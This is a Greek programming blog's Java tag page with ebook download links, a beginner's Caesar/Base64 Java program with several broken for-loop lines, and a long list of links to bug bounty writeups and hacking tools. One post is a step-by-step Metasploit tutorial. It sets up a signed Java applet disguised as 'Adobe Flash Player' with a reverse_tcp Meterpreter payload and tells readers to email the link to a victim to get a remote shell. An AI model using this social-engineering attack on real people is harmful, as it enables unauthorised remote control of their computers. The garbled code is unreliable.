Web Analytics Made Easy - StatCounter
FoulsCode

Εμφάνιση αναρτήσεων με ετικέτα Java. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα Java. Εμφάνιση όλων των αναρτήσεων

22 Οκτωβρίου 2017

Εισαγωγή στη γλώσσα προγραμματισμού JAVA



Η ραγδαία εξάπλωση του Internet και του World-Wide Web δημιούργησαν την ανάγκη νέων τρόπων ανάπτυξης και διανομής του λογισμικού. Οι απαιτήσεις αυτές οδήγησαν στην δημιουργία της γλώσσας προγραμματισμού Java, από την εταιρία Sun microsystems TM. Η Java σχεδιάστηκε με σκοπό την ανάπτυξη εφαρμογών που θα τρέχουν σε ετερογενή δικτυακά περιβάλλοντα.

Επιμέλεια: ΕΜΠ
Μέγεθος: 105 σελ. / 1 Mb
Μορφή: Pdf



https://mega.nz/#!0mJgRKSS!gDhqRpkTAZEp3b-riHlo_OjjdtkLPlNcEQuPxAuM-ss
Διαβάστε Περισσότερα »

20 Οκτωβρίου 2017

Σημειώσεις Java (book)



Γιατί JAVA;
1) Portable (φορητότητα): εκτέλεση του ίδιου κώδικα ανεξαρτήτως πλατφόρμας (αρκεί να είναι εγκατεστημένος ο αντίστοιχος μεταγλωττιστής Java) -> Internet
2) Αντικειμενοστραφής αλλά απλούστερη της C++
3) Μεγάλη βιβλιοθήκη κλάσεων (έτοιμων προγραμμάτων)
4) Χρησιμοποιεί στοιχεία της C

Συγγραφέας: Κωνσταντίνος Π. Φερεντίνος
Έτος έκδοσης: 2005
Μέγεθος: 74 σελ. / 581 Kb
Μορφή: pdf




Κώδικας:
https://mega.nz/#!BmoQiKCQ!7xjeQuzDRRQjSP2aQ1MN2l8vN9HCA7K_G0SKTAAe54s
  • Διαβάστε Περισσότερα »

    12 Ιουλίου 2017

    Rate my code - LetterHeron (#Java)



    Το LetterHeron (του έδωσα και όνομα) πέρνει ένα string και το κρυπτογραφεί είτε με Caesarian Shift είτε με Base64. Στο μέλλον ίσως να βάλλω και άλλες μεθόδους, αλλά για τώρα καλά είναι. Τα επόμενα proect θα έχουν και networking.


    Ευχάριστο πολύ τον (TrevorC) για αυτόν τον κώδικα!


    Code:


    import java.util.Scanner;
    import java.util.Base64;
    public class ltr 
    {
     public static void main(String[] args)
      {
       System.out.println("Choose encryption method");
       System.out.println("");
       System.out.println("Type 1 for Caesar Cipher");
       System.out.println("");
       System.out.println("Type 2 for Base64");
       Scanner s = new Scanner(System.in);
       int encMethod = s.nextInt();
       
       switch(encMethod)
        {
    case 1:
    ltr l = new ltr();
    ltr.Caesar();
    break;
     
    case 2:
    ltr lt = new ltr();
    ltr.Base64();
    break;
        }
        s.close();
      } 
      public static void Caesar()
    {
    Scanner sc = new Scanner(System.in);
        String msg;
        String key;
        int keyLength;
        
    System.out.println("Enter message:");
        msg = sc.nextLine();
        System.out.println("Enter encryption key:");
        key = sc.next();
        keyLength= key.length();
        System.out.println("1. Encrypt, 2. Decrypt, 3.Exit");
        int option = sc.nextInt();
           
    switch(option)
            {
                case 1:
                
                    System.out.println("Encrypted message..." +encrypt(msg,keyLength));
                    break;
                case 2:
                 
                    System.out.println("Decrypted message..." +decrypt(msg,keyLength));
                    break;
                case 3:
    System.exit(0);
    break;

    default:
                
    System.out.println("Invalid input! Type 4 for help.");
    break;
    }
           sc.close();
    }
     public static String encrypt(String msg,int keyLength)
      {
        String encrypted = "";
        for(int i=0;i
        {
            
            int c = msg.charAt(i);
            
            if(Character.isUpperCase(c))
            {
                c = c + (keyLength%26);
                
                if(c > 'Z')
                    c = c - 26;
            }
          
            else if(Character.isLowerCase(c))
            {
                c = c + (keyLength%26);
             
                if(c > 'z')
                    c = c - 26;
            }
            
            encrypted= encrypted + (char) c;
        }
        return encrypted;
     }
    public static String decrypt(String msg,int keyLength)
    {
        String decrypted = "";
        for(int i=0;i
        {
           
            int c = msg.charAt(i);
            
            if(Character.isUpperCase(c))
            {
                c = c -(keyLength%26);
               
                if( c < 'A')
                    c = c + 26;
            }
          
            else if(Character.isLowerCase(c))
            {
                c = c - (keyLength%26);
              
                if(c < 'a')
                    c = c + 26;
            }
            
            decrypted = decrypted + (char) c;
        }
        return decrypted;
    }
    public static void Base64()
     {
      int pick;
      
      System.out.println("Enter your message, with no spaces.");
      Scanner as = new Scanner(System.in);
      String msg = as.next();
      
      System.out.println("1. Encrypt, 2. Decrypt, 3.Exit");
      pick = as.nextInt();
      switch(pick)
      {
     case 1:
     byte[] encode = Base64.getEncoder().encode(msg.getBytes());
     System.out.println("The encoded message is: " + new String(encode));
     break;
     
     case 2:
     System.out.println("Please enter your message again");
     Scanner o = new Scanner(System.in);
     String ms = o.nextLine();
     byte[] s = ms.getBytes();
     byte[] decode = Base64.getDecoder().decode(s);
          System.out.println("Your message decoded is: " + new String(decode));
     
     case 3:
     System.exit(0);
     break;
      }
      as.close();
     }


    Διαβάστε Περισσότερα »

    9 Ιουλίου 2017

    Java Signed Applet Social Engineering Code Execution - Backtrack 5 R3

    Στο tutorial που ακολουθεί θα προσπαθήσω να σας δείξω πως χρησιμοποιούμε τα Social Engineering Tools για να χτυπήσουμε ένα θύμα. Η διαδικασία είναι απλή και όλο το νόημα αυτής βασίζεται στην αποστολή URL στο θύμα μας έτσι ώστε όταν ανοίξει το URL που θα του στείλουμε να εκτεθεί το σύστημα του.

    Requirement :

    1. Metasploit Framework

    2. Operating System(Προτείνω Linux OS ή Backtrack 5)

    Βήμα προς Βήμα:

    Α) Πρώτα απ' όλα ανοίγουμε ένα τερματικό πληκτρολογούμε:

    Terminal: msfconsole <-|


    Στη συνέχεια περιμένουμε λίγο και μας εμφανίζει msf> και πληκτρολογούμε:


    use exploit/multi/browser/java_signed_applet <-|(φορτίζουμε το java_signed_applet exploit)

    set payload windows/meterpreter/reverse_tcp <-|(ορίζουμε το reverse_tcp meterpreter έτσι ώστε να συνδεθούμε με το θύμα)


    Β) Το επόμενο βήμα είναι να πληκτρολογήσουμε κάποιες εντολές...


    Terminal: set appletname Adobe_Inc <-|
    set certcn Adobe Flash Player <-|

    set srvhost 192.168.8.92 <-| (η διεύθυνση τουδιακομιστή που ορίζει το exploit δηλαδή η διευθυνσή μας)

    set srvport 80 <-| (επιλέγουμε τη θύρα 80 διότι είναι η κατάλληλη για τέτοιου είδους επιθέσεις μέσω social engineering tools)

    set uripath videoplaylist <-| (η URL που στέλνουμε στο θύμα μας έτσι ώστε όταν την ανοίξει να εκτεθεί --> http://192.168.8.92/videoplaylist)

    set lhost 192.168.8.92 <-| (η διεύθυνση μας)

    set lport 443 <-| (η θύρα που χρησιμοποιούμε για να συνδεθούμε με το θύμα μας)

    exploit <-| (έναρξη έκθεσης...)


    Στη συνέχεια με κάποιο τρόπο πρέπει να αποστείλουμε στο θύμα μας τη διεύθυνση http://192.168.8.92/videoplaylist έτσι ώστε όταν την ανοίξει να αποκτήσουμε πρόσβαση στο σύστημά του. Μπορούμε να την αποστείλουμε με e-mail κτλ.

    Όταν λοιπόν την ανοίξει αμέσως στο τερματικό μας τρέχει το σύστημα και μας λέει ότι το meterpreter session 1 opened... και έχει ανοίξει το σύστημα του και μας εμφανίζεται η καρτέλα:


    Terminal: session -l <-| (για να δω τα ενεργά session)

    Μετά μας βγάζει ότι έχουμε ένα session στη λίστα μας και πληκτρολογώ ξανά..

    session -i <-|


    Τέλος μας εμφανίζει στην οθόνη meterpreter>που σημαίνει ότι έχουμε μπει πλέον στο σύστημα του.

    ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεταιποινικά από το νόμο.

    via: securitydnainfo.blogspot.gr


    Διαβάστε Περισσότερα »

    31 Δεκεμβρίου 2016

    Hacking Resources



    Disclosures

    Application Logic

    06/18/2013 - https://labs.spotify.com/2013/06/18/creative-usernames/ - Creative usernames and Spotify account hijacking
    06/26/2013 - Hijacking a Facebook Account with SMS - https://whitton.io/articles/hijacking-a-facebook-account-with-sms/
    03/25/2014 - Phabricator Bypass auth.email-domains - https://hackerone.com/reports/2233
    05/15/2016 - The Bank Job - https://boris.in/blog/2016/the-bank-job/
    05/19/2016 - InstaBrute: Two Ways to Brute-force Instagram Account Credentials - https://www.arneswinnen.net/2016/05/instabrute-two-ways-to-brute-force-i...
    06/06/2016 - Trello bug bounty: Payments informations are sent to the webhook - https://hethical.io/trello-bug-bounty-payments-informations-are-sent-to-...
    06/07/2016 - Pwning Pornhub (memcache) - https://blog.zsec.uk/pwning-pornhub/
    07/01/2016 - Magento – Re-Installation & Account Hijacking Vulnerabilities - http://netanelrub.in/2016/07/01/magento-re-installation-account-hijackin...
    08/08/2016 - Free way to Facebook Freebooting | Hacking Rights Manager - http://www.7xter.com/2016/08/free-way-to-facebook-freebooting.html
    08/16/2016 - Google Chrome, Firefox Address Bar Spoofing Vulnerability - http://www.rafayhackingarticles.net/2016/08/google-chrome-firefox-addres...
    08/18/2016 - How I hacked an Android App to Get Free Beer - https://breakdev.org/how-i-hacked-an-android-app-to-get-free-beer/
    09/02/2016 - Response To Request Injection (RTRI) - https://www.bugbountyhq.com/front/latestnews/dWRWR0thQ2ZWOFN5cTE1cXQrSFZ...

    Authentication

    04/27/2016 - Microsoft Office 365 SAML Bypass - http://www.economyofmechanism.com/office365-authbypass.html
    04/28/2016 - Slack bot token leakage exposing business critical information - https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-b...
    06/01/2016 - Taking over Heroku accounts - http://esevece.github.io/2016/06/01/taking-over-heroku-accounts.html
    10/20/2016 - Slack, a Brief Journey to Mission Control - http://secalert.net/slack-security-bug-bounty.html
    11/02/2016 - Bypassing Two-Factor Authentication on OWA & Office365 Portals - http://www.blackhillsinfosec.com/?p=5396

    CORS/CSP

    04/04/2016 - CSP: bypassing form-action with reflected XSS - https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-ref...
    12/16/2016 - Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - http://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin...

    CSRF

    05/17/2016 - How I bypassed Facebook CSRF in 2016 - http://pouyadarabi.blogspot.ca/2016/05/how-i-bypassed-facebook-csrf-in-2...
    19/07/2016 - Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-pic...
    26/10/2016 - Google Spreadsheet Vuln - CSRF and JSON Hijacking allows data theft - https://www.rodneybeede.com/Google_Spreadsheet_Vuln_-_CSRF_and_JSON_Hija...

    CSV Injection

    29/01/2013 - Cell Injection: Attacking the End User Through the Application - http://blog.7elements.co.uk/2013/01/cell-injection.html
    04/17/2016 - CSV Injection in business.uber.com - http://blog.daviddworken.com/posts/csv-injection-in-businessubercom/

    HPP

    08/23/2015 - Twitter HPP vulnerability unsubscribing from emails - http://www.merttasci.com/blog/twitter-hpp-vulnerability/
    12/03/2015 - Parameter Tampering Attack on Twitter Web Intents - https://ericrafaloff.com/parameter-tampering-attack-on-twitter-web-intents/
    02/02/2016 - Bypassing Digits web authentication's host validation with HPP - https://hackerone.com/reports/114169

    Host Header Injection
    09/06/2016 - Internet Explorer has a URL Problem - http://blog.innerht.ml/internet-explorer-has-a-url-problem/
    10/24/2016 - Combining Host Header Injection and Lax Host Parsing Service Malicious Data - https://labs.detectify.com/2016/10/24/combining-host-header-injection-an...

    IDOR

    06/23/2016 - UBER HACKING: HOW WE FOUND OUT WHO YOU ARE, WHERE YOU ARE AND WHERE YOU WENT! - https://labs.integrity.pt/articles/uber-hacking-how-we-found-out-who-you...
    06/23/2016 - Facebook's Bug - Delete any video from Facebook - http://www.pranavhivarekar.in/2016/06/23/facebooks-bug-delete-any-video-...
    08/25/2016 - How I Could Have Hacked Multiple Facebook Accounts - https://medium.com/@gurkiratsingh/how-i-could-have-hacked-multiple-faceb...
    11/22/2016 - You get a UUID! You get a UUID! Everybody gets a UUID! - http://www.rohk.xyz/uber-uuid/

    Information Disclosure

    12/21/2016 - Disclosing the primary email address for each Facebook user - http://www.dawgyg.com/2016/12/21/disclosing-the-primary-email-address-fo...

    SSRF

    04/18/2016 - ESEA Server-Side Request Forgery and Querying AWS Meta Data - http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-queryin...
    02/23/2016 - FFMPEG File Disclosure - https://github.com/ctfs/write-ups-2015/tree/master/9447-ctf-2015/web/sup...
    Trello Bug BOunty Access Servier Files Using Imagetragick - https://hethical.io/trello-bug-bounty-access-servers-files-using-imagetr...

    SSTI

    04/25/2016 - Adapting AngularJS Payloads to Exploit Real World Applications - http://blog.portswigger.net/2016/04/adapting-angularjs-payloads-to-explo...

    Reverse Engineering

    04/19/2016 - Digging into a Facebook Worm -https://gist.githubusercontent.com/phwd/0ec21c6289543f35135e17aa11f7dec1...
    07/01/2016 - How I Cracked a Keylogger and Ended Up in Someone's Inbox - https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keyl...
    11/14/2016 - Hacking Team Back For Your Androids - http://rednaga.io/2016/11/14/hackingteam_back_for_your_androids/

    Relative Path Overwrite

    03/21/2014 - Relative vs Absolute - http://www.thespanner.co.uk/2014/03/21/rpo/
    02/17/2015 - Detecting and exploiting path-relative stylesheet import (PRSSI) vulnerabilities - http://blog.portswigger.net/2015/02/prssi.html
    07/03/2016 - RPO Gadgets - http://blog.innerht.ml/rpo-gadgets/

    XSS

    07/06/2010 - Facebook XSS via Cross-Origin Resource Sharinghttp://maustin.net/2010/07/06/facebook_html5.html
    02/14/2013 - How I got the Bug Bounty for Mega.co.nz XSS - https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-...
    04/22/2015 - XSS via Host header - www.google.com/cse - http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html
    12/08/2015 - Creative bug which result Stored XSS on m.youtube.com - http://sasi2103.blogspot.ca/2015/12/creative-bug-which-result-stored-xss...
    04/17/2016 - XSS in pypi (and Uber!) - http://blog.daviddworken.com/posts/xss-in-pypi-and-uber/
    04/17/2016 - XSS in getrush.uber.com - http://blog.daviddworken.com/posts/xss-in-getrushubercom/
    04/19/2016 - Using a Braun Shaver to Bypass XSS Audit and WAF - https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-...
    05/09/2016 - XSS and RCE, domain takeover with remote loaded JS - http://brutelogic.com.br/blog/xss-and-rce/
    06/13/2016 - Embedding XSS in SVG files - http://bini.tech/wordpress-remote-upload-unrestricted-file-upload/
    07/02/2016 - OneDrive: an easter egg into MS library - XSS on Microsoft and not only - https://luc10.github.io/onedrive-an-easter-egg-into-ms-library/
    07/04/2016 - Apple and the 5 XSSes - http://strukt93.blogspot.ca/2016/07/apple-and-5-xsses.html
    07/19/2016 - Instagram Reflected XSS in Link Shim - http://ameeras.me/Instagram-Reflected-XSS-in-Link-Shim/
    07/19/2016 - Blind XSS in Spotify - https://mhmdiaa.github.io/jekyll/update/2016/07/19/blind-xss-in-spotify....
    07/22/2016 - United to XSS United - http://strukt93.blogspot.ca/2016/07/united-to-xss-united.html
    08/29/2016 - Turning Self-XSS into Good XSS v2: Challenge Completed but Not Rewarded - https://httpsonly.blogspot.ca/2016/08/turning-self-xss-into-good-xss-v2....
    08/31/2016 - Breaching a CA – Blind Cross-site Scripting (BXSS) in the GeoTrust SSL Operations Panel Using XSS Hunter - https://thehackerblog.com/breaching-a-ca-blind-cross-site-scripting-bxss...
    09/19/2016 - Combination of techniques lead to DOM Based XSS in Google - http://sasi2103.blogspot.ca/2016/09/combination-of-techniques-lead-to-do...
    12/07/2016 - Stored XSS Affecting All Fantasy Sports on Yahoo - http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fan...

    XXE

    06/25/2014 - Identifying Xml eXternal Entity vulnerability (XXE) in GPX files - http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
    03/21/2015 - XML External Entity (XXE) Injection in Apache Batik Library [CVE-2015-0250] - https://www.insinuator.net/2015/03/xxe-injection-in-apache-batik-library...
    08/14/2015 - XXE ALL THE THINGS!!! (INCLUDING APPLE IOS’S OFFICE VIEWER) - https://labs.integrity.pt/articles/xxe-all-the-things-including-apple-io...

    CRLF

    03/15/2015 - Parse.com - X-Forwarded-Host Injection - Bypass secure & HTTP_only Vulnerability - https://www.youtube.com/watch?v=1yUw7rtTTeI

    Remote Code Execution

    12/09/2013 - Remote Code Execution exploit in WordPress 3.5.1 - https://tom.vg/2013/12/wordpress-rce-exploit/
    02/15/2015 - RCE in Oracle NetBeans Opensource Plugins: PrimeFaces 5.x Expression Language Injection - http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource...
    11/06/2015 - Java unserialization - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss...
    11/12/2015 - XSS to Remote Code Execution with HipChat - http://maustin.net/2015/11/12/hipchat_rce.html
    05/04/2016 - Remote Code Execution via ImageMagick - http://pastebin.com/aE4sKnCg (file)
    05/10/2016 - Exploiting ImageMagick on Polyvore (Yahoo) - http://nahamsec.com/exploiting-imagemagick-on-yahoo/
    07/22/2016 - Exploiting Java Deserialization via JBoss - https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserializati...
    07/25/2016 - CVE-2016-5840: Trend Micro Deep Discovery hotfix_upload.cgi filename Remote Code Execution Vulnerability - http://www.korpritzombie.com/cve-2016-5840-trend-micro-deep-discovery-ho...
    08/15/2016 - Jetbrains IDE Remote Code Execution and Local File Disclosure - http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-e...
    08/24/2016 - The Million Dollar Dissident - https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-...
    09/21/2016 - pwn them for learn -http://bugdisclose.blogspot.ca/2016/09/pwn-them-for-learn.html
    10/26/2016 - Details on the Privilege Escalation Vulnerability in Joomla - https://blog.sucuri.net/2016/10/details-on-the-privilege-escalation-vuln...

    Memory Related

    5/13/2016 - 7-Zip vulnerabilities found by Talos - http://blog.talosintel.com/2016/05/multiple-7-zip-vulnerabilities.html

    Source Code Disclosure

    03/27/2016 - A tale of an interesting source code leak - http://secalert.net/#scl-soh
    07/19/2016 - Accessing PornHub's SVN repo - https://hackerone.com/reports/72243
    07/22/2016 - Twitter's Vine Source code dump - https://avicoder.me/2016/07/22/Twitter-Vine-Source-code-dump/
    10/14/2016 - Importance of up-to-date application usage plus complex password OR from directory traversal to admin panel takeover - http://zuh4n.blogspot.ca/

    SQLi

    12/20/2016 - Flickr from SQLi to RCE - https://pwnrules.com/flickr-from-sql-injection-to-rce/
    07/25/2016 - SQL Injection on sctrack.email.uber.com.cn - https://hackerone.com/reports/150156

    Subdomain Takeover

    10/21/14 - Hostile Subdomain Takeover using Heroku/Github/Desk + more - https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-h...
    12/08/14 - Hijacking of abandoned subdomains part 2 - https://labs.detectify.com/2014/12/08/hijacking-of-abandoned-subdomains-...
    07/26/16 - Uber Subdomain Takeover - http://blog.eseccyber.tech/article/uber.html
    09/05/2016 - How I was able to read Uber logs and internal emails - http://blog.pentestnepal.tech/post/149985438982/how-i-was-able-to-read-u...

    HTML Injection

    07/26/2016 - Keeping Positive – Obtaining Arbitrary Wildcard SSL Certificates from Comodo via Dangling Markup Injection - https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-...

    OAuth

    02/07/2014 - How I Hacked GitHub Again. - http://homakov.blogspot.ca/2014/02/how-i-hacked-github-again.html
    07/20/2015 - Bypassing Google Authentication on Periscope's Administration Panel - https://whitton.io/articles/bypassing-google-authentication-on-periscope...
    01/04/2016 - Bypassing callback_url validation on Digits - https://hackerone.com/reports/108113
    02/29/2016 - Swiping Facebook Official Access Tokens - http://philippeharewood.com/swiping-facebook-official-access-tokens/
    04/03/2016 - Obtaining Login Tokens for Outlook, Office or Azure (OAuth) - https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/
    06/16/2016 - Bypass Disabled Client OAuth Login in Facebook Pages Manager App - http://philippeharewood.com/bypass-disabled-client-oauth-login-in-facebo...
    10/13/2016 - CVE-2016-4977: RCE in Spring Security OAuth - http://secalert.net/#CVE-2016-4977

    Mobile

    04/12/2015 - Shopify android client all API request's response leakage - https://hackerone.com/reports/56002
    07/26/2016 - Odnoklassniki Android application vulnerabilities - https://hackerone.com/reports/97295

    Browser
    12/06/16 - Firefox - SVG cross domain cookie vulnerability - https://insert-script.blogspot.ca/2016/12/firefox-svg-cross-domain-cooki...


    CTF Writeups

    03/03/2013 - Unauthorized Access: Bypassing PHP strcmp() - http://danuxx.blogspot.ca/2013/03/unauthorized-access-bypassing-php-strc...
    06/09/2016 - Hack in the Box 2016 – MISC400 Writeup (Part 1) - http://rileykidd.com/2016/06/09/hack-in-the-box-2016-misc400-writeup-par...
    10/03/2016 - Hacking the Hard Way at the Derbycon CTF - https://labs.signalsciences.com/hacking-the-hard-way-at-the-derbycon-ctf...
    BSides Ottawa CTF - Second Place! - https://blog.fletchto99.com/2016/october/bsides-ottawa/
    2016 Hack the Vote - https://github.com/ctfs/write-ups-2016/tree/master/hack-the-vote-ctf-2016
    Resources

    XXE Payloads in iOS - http://en.hackdig.com/08/28075.htm
    Burp Tutorials - https://vimeo.com/album/3510171
    Facebook CTF - https://github.com/facebook/fbctf
    SSRF Bible - https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa...
    Jerry Gamblin Hacking Blog - http://jerrygamblin.com/category/hacking
    Filedescriptor XSS Polygots - http://polyglot.innerht.ml/
    prompt.ml XSS Challenge - https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#hidden-level--1
    Hacking with Unicode - https://speakerdeck.com/mathiasbynens/hacking-with-unicode-in-2016
    Programming Practice (paid premium) - https://coderbyte.com/
    Online CTF Practice challenges - https://backdoor.sdslabs.co
    Nicolas Grégoire Burp Pro Tips - http://www.agarri.fr/docs/HiP2k13-Burp_Pro_Tips_and_Tricks.pdf
    Open Security Training - http://opensecuritytraining.info/
    OWASP Mutillidae II Web Pen-Test Practice Application - https://sourceforge.net/projects/mutillidae/
    DNS - https://haxpo.nl/haxpo2015ams/wp-content/uploads/sites/4/2015/04/D1-P.-M...
    XSS without HTML: Client-Side Template Injection with AngularJS - http://blog.portswigger.net/2016/01/xss-without-html-client-side-templat...
    File Upload XSS - http://brutelogic.com.br/blog/file-upload-xss/
    CSV Injection Mitigations - https://blog.zsec.uk/csv-dangers-mitigations/
    Comma Separated Vulnerabilities - http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
    Running your own anonymous rotating proxies - http://blog.databigbang.com/running-your-own-anonymous-rotating-proxies/
    Reviewing bug bounties - a hacker's perspective - http://www.skeletonscribe.net/2016/08/reviewing-bug-bounties-hackers.html
    Practical HTTP Host Header Attacks - http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks...
    Practice CTF List / Permanant CTF List - https://captf.com/practice-ctf/
    lcamtuf's blog - https://lcamtuf.blogspot.ca/
    Backup File Artifacts - http://blog.mazinahmed.net/2016/08/backup-file-artifacts.html
    Unicode Character 'PILE OF POO' - http://www.fileformat.info/info/unicode/char/1F4A9/index.htm
    Decompile and Recompile Android APK - https://blog.bramp.net/post/2015/08/01/decompile-and-recompile-android-apk/
    Frans Rosen - Time Based Captcha Protected SQLi - http://www.slideshare.net/fransrosen/time-based-captcha-protected-sql-in...
    CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy - https://research.google.com/pubs/pub45542.html
    How to View TLS Traffic in Android’s Logs - https://blog.securityevaluators.com/how-to-view-tls-traffic-in-androids-...
    https://url.spec.whatwg.org/
    AngularJS Sandbox Escapes Explained - https://www.reddit.com/r/angularjs/comments/557bhr/xss_in_angularjs_vide...
    Senate Republicans were skimmed for six months, quietly fix store - https://gwillem.github.io/2016/10/04/how-republicans-send-your-credit-ca...
    Introduction to OSINT: Recon-ng Tutorial - https://strikersecurity.com/blog/getting-started-recon-ng-tutorial/
    Exploiting CORS misconfigurations - http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-fo...
    Abusing Dorking and Robots.txt - http://sten0.ghost.io/2016/10/13/abusing-dorking-and-robots-txt/
    Brute Logic XSS Challenge I - http://brutelogic.com.br/blog/xss-challenge-i/
    How Google and Bing Protect their APIs - https://rudk.ws/2016/10/23/how-google-and-bing-protects-their-api/
    Free Dev Books - https://devfreebooks.github.io/
    IOS Application Security Review Methodology - http://research.aurainfosec.io/ios-application-security-review-methodology/
    Anatomy of a Subtle JSON Vulnerability - http://haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerabi...
    Finding XSS Slidedeck - http://slides.com/mscasharjaved/deck-13#/
    XSS Polyglots - https://blog.bugcrowd.com/xss-polyglots-the-context-contest?utm_campaign...
    Bypassing Saml 2.0 SSO - http://research.aurainfosec.io/bypassing-saml20-SSO/
    Bypassing CSP using polyglot jpegs - http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html
    Facebook Graphql Crash Course - https://www.facebook.com/notes/phwd/a-facebook-graphql-crash-course/1189...
    New XXSI Vector Untold Merits of nosniff - https://www.hurricanelabs.com/blog/new-xssi-vector-untold-merits-of-nosniff
    Research papers

    Minded Security Expression Language Injection Paper - https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf
    Sandboxing JavaScript in the Browser - https://var.thejh.net/thesis_excerpt.pdf
    Does The Online Card Payment Landscape Unwittingly Facilitate Fraud? - http://eprint.ncl.ac.uk/file_store/production/230123/19180242-D02E-47AC-...
    Online Courses / Training

    Cyber Security Base with F-Secure is a free course series by University of Helsinki - https://cybersecuritybase.github.io/
    Vulnerable Web Applications for Learning - https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applica...
    Jame Kettle's hackxor - http://hackxor.sourceforge.net/cgi-bin/index.pl#demo
    Google XSS Game - https://xss-game.appspot.com/
    Google DOM Based XSS - https://public-firing-range.appspot.com/address/index.html
    Code Lab: Web Application Exploits and Defenses - https://google-gruyere.appspot.com/
    Cheat Sheets

    Path Traversal Cheat Sheet Linux - https://www.gracefulsecurity.com/path-traversal-cheat-sheet-linux/
    XXE - https://www.gracefulsecurity.com/xxe-cheatsheet/
    HTML5 Security Cheat Sheet - https://html5sec.org/
    Brute XSS Cheat Sheet - http://brutelogic.com.br/blog/cheat-sheet/
    MySQL SQL Injection Cheat Sheet - http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-c...
    AngularJS Sandbox Bypass Collection (includes 1.5.7) - http://pastebin.com/xMXwsm0N
    Java Deserialization - https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
    Penetration testing tools cheat sheet - https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
    OAuth - https://github.com/homakov/oauthsecurity
    Burp How Tos

    http://security-geek.in/2014/08/22/using-burp-suite-to-brute-force-http-...
    Tools

    Discovery
    https://github.com/OJ/gobuster
    Sublist3r is python tool that is designed to enumerate subdomains of websites using search engines - https://github.com/aboul3la/Sublist3r
    EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible - https://github.com/ChrisTruncer/EyeWitness
    Smart content discovery burp plugin with context awareness - https://github.com/pathetiq/BurpSmartBuster
    An automated tool that checks for backup artifacts that may discloses the web-application's source code - https://github.com/mazen160/bfac

    Recon-ng
    Recon-ng + Google Dorks + Burp = ... - https://averagesecurityguy.github.io/2016/10/21/recon-ng-dorks-burp/

    Port Scanning
    Resolve and quickly portscan a list of (sub)domains - https://github.com/melvinsh/subresolve

    Mobile
    JD-GUI, a standalone graphical utility that displays Java sources from CLASS files. - https://github.com/java-decompiler/jd-gui
    Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static, dynamic analysis and web API testing - https://github.com/ajinabraham/Mobile-Security-Framework-MobSF
    An xposed module that disables SSL certificate checking for the purposes of auditing an app with cert pinning - https://github.com/Fuzion24/JustTrustMe
    Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and OS X Apps - https://github.com/nabla-c0d3/ssl-kill-switch2
    Android APK Tool - https://ibotpeaches.github.io/Apktool/
    Android Dex2Jar - https://github.com/pxb1988/dex2jar

    Decompiler
    JPEXS Free Flash Decompiler - https://github.com/jindrapetrik/jpexs-decompiler
    Flashbang, find theflashVars of a naked SWF and display them - https://github.com/cure53/Flashbang

    Java Deserialization
    A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization - https://github.com/frohoff/ysoserial

    Password Cracking
    John the Ripper - http://www.openwall.com/john/

    Hash Cracking
    Online Hash Crack - http://www.onlinehashcrack.com/
    CyberChef - https://gchq.github.io/CyberChef/

    Vulnerability SaaS
    SSRF Detector - https://ssrfdetector.com/
    XSSHunter - https://xsshunter.com



    via: www.torontowebsitedeveloper.com
    Διαβάστε Περισσότερα »
    Related Posts Plugin for WordPress, Blogger...